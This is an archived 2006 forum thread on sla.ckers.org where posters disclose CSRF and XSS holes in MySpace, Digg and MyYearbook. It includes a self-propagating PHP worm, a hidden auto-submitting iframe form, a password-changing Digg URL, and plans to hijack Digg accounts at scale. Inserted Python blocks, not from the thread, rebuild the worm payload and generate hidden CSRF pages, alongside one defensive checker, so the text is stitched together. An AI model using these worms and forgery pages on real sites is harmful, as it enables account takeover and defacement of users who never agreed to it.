Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
CSRF Full Disclosure
Posted by: rsnake
Date: October 17, 2006 04:58PM

If you guys have any CSRF issues you want to post in websites, here's the place.

- RSnake
Gotta love it. http://ha.ckers.org

Re: CSRF Full Disclosure
Date: October 18, 2006 06:34PM

I found a lot on a certain forum service however I was threatened once again by legal action via the service owner. I would however like to try my luck with a CSRF worm, but I'll need help with one portion.


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Re: CSRF Full Disclosure
Posted by: rsnake
Date: October 18, 2006 07:01PM

Welp, ask away. Maybe someone here can lend a hand.

- RSnake
Gotta love it. http://ha.ckers.org

Re: CSRF Full Disclosure
Posted by: unsticky
Date: October 19, 2006 02:51AM

I had found a few interesting CSRF vulns, but well... being me and all, I wrote and released worms for the vectors and now they're all patched up. I've still got copies of the php scripts I used for the worms which I could post, if they'd be of interest to anyone.

Re: CSRF Full Disclosure
Posted by: maluc
Date: October 19, 2006 03:35AM

yes, patched or not they're interesting to see .. i'll be happy to see them ^^

-maluc

Re: CSRF Full Disclosure
Posted by: rsnake
Date: October 19, 2006 11:00AM

Agreed... as sample code it's worth taking a look at, even if it's partially broken or disabled by the host in question.

- RSnake
Gotta love it. http://ha.ckers.org

Re: CSRF Full Disclosure
Posted by: unsticky
Date: October 19, 2006 02:43PM

I've still got code for two of my MyYearbook.com CSRF worms, which I released after I realized the staff that I'd attempted to report my finds to were completely incompetent. The first of the two worms was a little bit more fun than the second, as I'd found you could completely set a user's profile contents via CSRF. Set them to at least an image tag pointing back to your PHP script, and ta-da, you've got a pleasant profile-defacing worm. The second I only released because the vector I'd found was rather interesting. The injection point was through a custom link in the 'My Links' section of the profiles. The URL field was not properly sanitized and allowed for event-based XSS, since all brackets were stripped because of my previous escapades. Combining the onMouseOver event with createElement(), to generate an image tag to access my CSRF script, I created a wondrous MouseOver CSRF worm. I'll only post the code for the MouseOver worm, since the code for both worms is relatively similar as well as horridly simple, and the XSS of the MouseOver worm would stick more with the XSS theme.

MOW.php:
<?php
// Text the injected handler writes into the hovered link (also used as the site description).
$msg="You Sunk My Battleship!";
// Link name: a quote closes the URL attribute, then an onmouseover handler is added that
// builds an <img> with createElement (no literal brackets, which the site strips) whose src
// points back at this script, so any logged-in viewer who hovers sends the forged request.
$myc="\" onmouseover=\"i=document.createElement('img'); i.src='http://" . $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF'] . "';this.innerHTML='" . $msg . "';\" ";
// Redirect the visitor's browser (cookies included) to the 'My Links' add-site action with the payload as the link name.
Header("Location: http://" . "www.myyearbook.com/index.php?mysession=cmVnaXN0cmF0aW9uX2FkZGZhdm91cml0ZXNpdGU=&sitename=" . urlencode($myc) . "&sitedesc=" . urlencode($msg) . "&action=1&image.x=39&image.y=13");
?>

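An added example, not code from the thread or from MyYearbook, showing why a filter that only strips angle brackets does not stop the attribute breakout unsticky describes. `mow_payload()` rebuilds the 'sitename' value MOW.php sends; the two `render_link_*` functions are hypothetical stand-ins for how a 'My Links' entry might be rendered, and the attacker URL is an assumed value. Everything runs offline.

```python
# Added example (not from the thread): bracket stripping vs attribute-context encoding.
import re
from html import escape

MSG = "You Sunk My Battleship!"
SCRIPT_URL = "http://attacker.example/MOW.php"   # assumed location of the worm script


def mow_payload(msg: str = MSG, script_url: str = SCRIPT_URL) -> str:
    """The link value MOW.php submits: a quote to close the attribute, then an event handler
    that creates the <img> with DOM calls instead of literal brackets."""
    return (
        '" onmouseover="i=document.createElement(\'img\'); i.src=\''
        + script_url + "';this.innerHTML='" + msg + "';\" "
    )


def strip_brackets(value: str) -> str:
    """Hypothetical filter in the style the post describes: drop < and > and nothing else."""
    return re.sub(r"[<>]", "", value)


def render_link_naive(url: str, text: str) -> str:
    """Link markup built with the bracket-stripping filter (vulnerable: the quote in the
    URL ends the href attribute and the rest lands inside the tag)."""
    return '<a href="' + strip_brackets(url) + '">' + strip_brackets(text) + "</a>"


def render_link_safe(url: str, text: str) -> str:
    """Same markup with attribute-context encoding: quotes become &quot; so the value can
    never end the attribute (PHP's htmlspecialchars($s, ENT_QUOTES) does the same)."""
    return '<a href="' + escape(url, quote=True) + '">' + escape(text) + "</a>"


def injected_handlers(html: str) -> list:
    """Simple check: on* attributes that ended up inside a tag, i.e. preceded by a literal
    quote or whitespace and followed by a quoted value."""
    return re.findall(r'["\s](on[a-z]+)\s*=\s*"', html)
```

The point of the check is the attribute context: stripping `<` and `>` only matters for markup in text nodes, while inside an attribute the dangerous character is the quote, and `createElement` supplies the brackets later at run time.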
Re: CSRF Full Disclosure
Posted by: maluc
Date: October 20, 2006 03:23PM

I guess i'll start it off, with a still live one. Victim must be logged in first.

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://settings.myspace.com/user/accountSetting_update.cfm?z=1&preferredCulture=fr-FR&timezone=11 myspace.com

Changes Language to french, and sets their time to match Moscow. For those that don't read french, you can get back to the settings menu here: http://settings.myspace.com/index.cfm?fuseaction=user.accountSetting

Usage:
preferredCulture= (de-DE||en-AU||en-GB||en-IE||en-US||fr-FR)
timezone= (-4...20) 0 is central US time

The rest of their settings menu, aside from change email and change pass, is also probably vulnerable.

-maluc

Re: CSRF Full Disclosure
Posted by: Ghozt
Date: October 20, 2006 03:46PM

I guess I'll make a myspace account to mess around with.

Re: CSRF Full Disclosure
Posted by: Kyran
Date: October 20, 2006 04:27PM

http://collect.myspace.com/index.cfm?fuseaction=signout Works everywhere except for actually on Myspace. They seem to block IMG tags that aren't images.

- Kyran

Re: CSRF Full Disclosure
Posted by: Ghozt
Date: October 20, 2006 05:27PM

Kyran, I wouldn't really call that CSRF :P.

Re: CSRF Full Disclosure
Posted by: maluc
Date: October 20, 2006 06:26PM

Well it is actually CSRF ^^ .. just mostly useless by itself. If you're combining it with an XSS hole to abuse password managers and grab the plaintext pass, then it's probably useful.

But ya, i doubt most any site will tokenize the logout buttons.

-maluc

Re: CSRF Full Disclosure
Posted by: Kyran
Date: October 20, 2006 06:33PM

Ghozt Wrote:
-------------------------------------------------------
> Kyran, I wouldn't really call that CSRF :P.


But it is! I swear! :P


maluc Wrote:
-------------------------------------------------------
> Well it is actually CSRF ^^ .. just mostly useless
> by itself. If you're combining it with an XSS
> hole to abuse password managers and grab the
> plaintext pass, then it's probably useful.
>
> But ya, i doubt most any site will tokenize the
> logout buttons.
>
> -maluc

Yeah. I've been playing around a lot with the password manager idea since it was mentioned on the forums, which is why I posted that one.

- Kyran

Re: CSRF Full Disclosure
Posted by: Spikeman
Date: October 21, 2006 04:19PM

maluc Wrote:
-------------------------------------------------------
> http://www.whiteacid.org/misc/xss_post_forwarder.p
> hp?xss_target=http://settings.myspace.com/user/acc
> ountSetting_update.cfm?z=1&preferredCulture=fr-FR&
> timezone=11 myspace.com

Since that uses whiteacid's post forwarder, I'm just wondering how exactly you would pull something like this off in the wild? Maybe trick them into another site infected with the form and XSS that submits the form once it's loaded? Or does whiteacid have some sort of tool like this?

Re: CSRF Full Disclosure
Posted by: Kyran
Date: October 21, 2006 04:23PM

It requires a bit of social engineering but it shouldn't be hard with DWORD obfuscation.

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://settings.myspace.com/user/accountSetting_update.cfm?z=1&preferredCulture=fr-FR&timezone=11

Copy + Paste the html below the submit button into a page. Send target to that page.
It will auto-submit.

- Kyran

Re: CSRF Full Disclosure
Posted by: Ghozt
Date: October 21, 2006 10:24PM

Spikeman Wrote:
-------------------------------------------------------
> Since that uses whiteacid's post forwarder, I'm
> just wondering how exactly you would pull
> something like this off in the wild? Maybe trick
> them into another site infected with the form and
> xss that submit's the form once it's loaded? Or
> does whiteacid have some sort of tool like this?


In the wild, you could just edit WhiteAcid's code to automate it.

Re: CSRF Full Disclosure
Posted by: maluc
Date: October 22, 2006 02:11AM

It uses the POST forwarder because it cannot be sent by GET. So therefore i can't email someone to click the link:
http://settings.myspace.com/user/accountSetting_update.cfm?z=1&preferredCulture=fr-FR&timezone=11

it wouldn't work. However you can send them something like so: 'Hey check out these dancing kittens: http://maluc.sitesled.com/kittendance.html (i'm too lazy to make an actual kitten dancing page, but you get the idea)..

Once they visit your site, or any you can inject html/script into.. You can for example include the following html:
<html>
<body onload="autopost.submit()">
<iframe name="hiddenframe"></iframe>
<form name="autopost" method="post" target="hiddenframe" action="http://settings.myspace.com/user/accountSetting_update.cfm?z=1">
<input type="hidden" name="preferredCulture" value="fr-FR" />
<input type="hidden" name="timezone" value="11" />
</form>
</body>
</html>

Can be done several ways, but this is probably the simplest

-maluc

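An added example, not code from the thread or from whiteacid's forwarder: a small generator for the auto-submitting page maluc shows, doing by script what the `xss_post_forwarder.php` link does by hand. It takes a forwarder-style target ("URL?field=value&..."), keeps any named parameters in the action's query string (the `z=1` above), turns the rest into hidden fields, and emits the hidden-iframe form page; `img_beacon()` covers endpoints that accept GET, like the logout URL Kyran posted. The MySpace URL is the one from the thread; nothing here contacts any server.

```python
# Added example (not from the thread): build an auto-submitting POST page for a CSRF test.
from html import escape
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit


def split_target(forwarder_target: str, keep_in_query=()):
    """Split 'http://host/path?a=1&b=2' into (action URL, [(name, value), ...]).
    Names listed in keep_in_query stay in the action's query string instead of
    becoming form fields (some handlers read them from the URL, not the body)."""
    parts = urlsplit(forwarder_target)
    pairs = parse_qsl(parts.query, keep_blank_values=True)
    stay = [(n, v) for n, v in pairs if n in keep_in_query]
    fields = [(n, v) for n, v in pairs if n not in keep_in_query]
    action = urlunsplit((parts.scheme, parts.netloc, parts.path, urlencode(stay), ""))
    return action, fields


def build_autosubmit_page(action: str, fields, hidden: bool = True) -> str:
    """Page that POSTs `fields` to `action` into an iframe as soon as it loads.
    Every value is attribute-encoded so a stray quote cannot break the form markup."""
    inputs = "\n".join(
        '  <input type="hidden" name="%s" value="%s" />'
        % (escape(n, quote=True), escape(v, quote=True))
        for n, v in fields
    )
    style = ' style="visibility:hidden;height:0;width:0"' if hidden else ""
    return (
        "<html>\n"
        '<body onload="document.forms.autopost.submit()">\n'
        '<iframe name="hiddenframe"%s></iframe>\n'
        '<form name="autopost" method="post" target="hiddenframe" action="%s">\n'
        "%s\n"
        "</form>\n"
        "</body>\n"
        "</html>\n"
    ) % (style, escape(action, quote=True), inputs)


def img_beacon(url: str) -> str:
    """The GET variant: a zero-size image that fires the request from any page."""
    return '<img src="%s" width="0" height="0" alt="" />' % escape(url, quote=True)


if __name__ == "__main__":
    target = ("http://settings.myspace.com/user/accountSetting_update.cfm"
              "?z=1&preferredCulture=fr-FR&timezone=11")
    action, fields = split_target(target, keep_in_query=("z",))
    print(build_autosubmit_page(action, fields, hidden=False))
    print(img_beacon("http://collect.myspace.com/index.cfm?fuseaction=signout"))
```

Run it with `hidden=False` first, as maluc suggests, so the response is visible in the frame and you can confirm the submit actually happens before hiding it.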
Re: CSRF Full Disclosure
Posted by: maluc
Date: October 22, 2006 02:18AM

and to make the iframe actually hidden, add in the attribute:
style="visibility:hidden;height:0;width:0"

But while it's unhidden, you can see that it actually autosubmits and shows myspace inside the frame window

-maluc

Re: CSRF Full Disclosure
Posted by: kirke
Date: October 22, 2006 03:21PM

> It uses the POST forwarder because it cannot be sent by GET. So therefore i can't email someone to click the link:

there're a lot of ways to do it by email, just a few examples:
- link to another site, as already said
- embedded pdf
- embedded flash
- embedded active scripting(JavaScript, ActiveX, java) if the MUA is too stupid

Re: CSRF Full Disclosure
Posted by: rsnake
Date: October 22, 2006 03:38PM

Another example: .html file renamed to .doc with a link header, a la the webbug: http://ha.ckers.org/webbug.html

- RSnake
Gotta love it. http://ha.ckers.org

Re: CSRF Full Disclosure
Posted by: maluc
Date: October 23, 2006 06:05PM

I don't actually have a working example for this, just a heads up for IE7 users. If you find an XSS hole on a microsoft domain..
 javascript:window.external.customizesettings(false,false,'is-is')
will disable the victim's anonymous usage statistics, disable the anti-phishing toolbar, and change their default language to Icelandic.

the stipulation is that it has to execute from a microsoft domain..

-maluc

Re: CSRF Full Disclosure
Posted by: Ghozt
Date: October 30, 2006 05:51PM

Digg - http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://digg.com/profileedit/$user?name=&location=&im_type=aim&im_name=&homepage=&email=$email&password1=$password&password2=$password&process=1

Replace:
$user
$email
$password

Re: CSRF Full Disclosure
Posted by: rsnake
Date: October 30, 2006 09:05PM

At least you have to know their email address. Not that that's hard or anything but still. Nice find.

- RSnake
Gotta love it. http://ha.ckers.org

Re: CSRF Full Disclosure
Posted by: Ghozt
Date: October 30, 2006 09:14PM

rsnake Wrote:
-------------------------------------------------------
> At least you have to know their email address.
> Not that that's hard or anything but still. Nice
> find.


No you don't, it can be random.
I reported it to abuse@digg.com earlier, I don't think he knew what I was talking about. I explained it more in the second email, though.

Re: CSRF Full Disclosure
Posted by: rsnake
Date: October 30, 2006 10:01PM

So the only thing that's required to be valid is the username and the password you want to set it to?

- RSnake
Gotta love it. http://ha.ckers.org

Re: CSRF Full Disclosure
Posted by: Ghozt
Date: October 30, 2006 10:03PM

Yep.

Re: CSRF Full Disclosure
Posted by: maluc
Date: October 30, 2006 10:48PM

well they have to make the request, not you obviously.. but this can still be automated, by finding an XSS hole in digg.com to pull their username from when they visit evil.com. or using mhtml..

Throw it on a page, and digg it yourself. Change anyone's digg password who visits it to Haxxed. Then automate logging in as them and digging your own story. Which will bring more digg people ^^. Good way to get a lot of visitors in a hurry.. and be able to digg any number of other websites with those accounts. Not very covert though.. but effective.

-maluc

Re: CSRF Full Disclosure
Posted by: rsnake
Date: October 31, 2006 10:07AM

Covert CSRF and XSS is a whole other topic and one I am sure I can help with if it ever needs to happen, but yes, I can see why this would work in either case. Without knowing the username though you can't really do much with this as a remote CSRF, so it would have to use XSS to read the username off the page somewhere or some other place that has access to the username. Still cool though.

- RSnake
Gotta love it. http://ha.ckers.org

Re: CSRF Full Disclosure
Posted by: maluc
Date: October 31, 2006 12:58PM

well there is an XSS hole on digg, and took all of two minutes to find - so i'm sure you guys can find it as well. but really, with an XSS hole any form/command on every site is CSRFable as long as it's not captcha'd

That being said, i was gonna ask a question about captchas but i'll move it to the captcha forum.. so, go there --> http://sla.ckers.org/forum/read.php?7,2298

-maluc



Edited 1 time(s). Last edit at 10/31/2006 01:41PM by maluc.

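An added example, not code from the thread or from any site named in it, showing the server-side checks that make maluc's auto-posted form and the GET/img variants fail, run against constructed requests. The secret key, session ids and header values are assumed; the only thing taken from the thread is the settings origin. It also encodes maluc's caveat above: a request forged by script running on the site's own origin carries the right Origin and can read the token off the page, so the checks pass and only CAPTCHA-style interaction (or fixing the XSS) helps there.

```python
# Added example (not from the thread): server-side CSRF checks on constructed requests.
import hashlib
import hmac
from dataclasses import dataclass, field

SERVER_KEY = b"assumed per-deployment secret"   # assumed; keep server-side, rotate on compromise
SITE_ORIGIN = "http://settings.myspace.com"    # origin of the settings form, from the thread


@dataclass
class Request:
    method: str
    headers: dict = field(default_factory=dict)
    cookies: dict = field(default_factory=dict)
    form: dict = field(default_factory=dict)


def csrf_token(session_id: str) -> str:
    """Synchronizer token bound to the session. The real form embeds it as a hidden field;
    a page on another origin cannot read the session cookie, so it cannot compute it."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def request_origin(req: Request):
    """Origin header if present, else scheme://host of the Referer, else None."""
    if "Origin" in req.headers:
        return req.headers["Origin"]
    ref = req.headers.get("Referer", "")
    if "://" in ref:
        scheme, rest = ref.split("://", 1)
        return scheme + "://" + rest.split("/", 1)[0]
    return None


def check_state_change(req: Request) -> str:
    """Return 'ok' or a rejection reason for a state-changing request such as
    accountSetting_update. Order: method, session, origin (fail closed), token."""
    if req.method != "POST":
        # Kills the <img src=...> and plain-link variants outright.
        return "reject: state change must be POST, not " + req.method
    sid = req.cookies.get("session")
    if not sid:
        return "reject: no session"
    origin = request_origin(req)
    if origin != SITE_ORIGIN:
        # A missing Origin/Referer is treated like a foreign one: fail closed.
        return "reject: origin %r is not %s" % (origin, SITE_ORIGIN)
    token = req.form.get("csrf_token", "")
    if not hmac.compare_digest(token, csrf_token(sid)):
        return "reject: bad or missing token"
    return "ok"


def sample_requests(sid: str = "s3ss10n-assumed") -> dict:
    """Constructed requests: a legitimate submit, maluc's cross-site auto-post, a GET
    link/img, one with no Origin or Referer, and a same-origin forgery (the XSS case)."""
    base = {"preferredCulture": "fr-FR", "timezone": "11"}
    return {
        "legit": Request("POST", {"Origin": SITE_ORIGIN}, {"session": sid},
                         dict(base, csrf_token=csrf_token(sid))),
        "kittendance": Request("POST", {"Origin": "http://maluc.sitesled.com"},
                               {"session": sid}, dict(base)),
        "get_link": Request("GET", {"Referer": "http://maluc.sitesled.com/x.html"},
                            {"session": sid}, dict(base)),
        "no_headers": Request("POST", {}, {"session": sid}, dict(base)),
        "xss_on_site": Request("POST", {"Referer": SITE_ORIGIN + "/index.cfm?fuseaction=user.accountSetting"},
                               {"session": sid}, dict(base, csrf_token=csrf_token(sid))),
    }
```

Two caveats worth stating plainly: `SameSite` cookie attributes, which did not exist when this thread was written, add a browser-enforced layer on top of these checks today; and none of this distinguishes the `xss_on_site` case from `legit`, which is exactly maluc's point.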
Re: CSRF Full Disclosure
Posted by: rsnake
Date: October 31, 2006 08:14PM

maluc, you're a bad boy and your mother should spank you. That said, I can't wait for when you go public with whatever you have in mind. :)

- RSnake
Gotta love it. http://ha.ckers.org
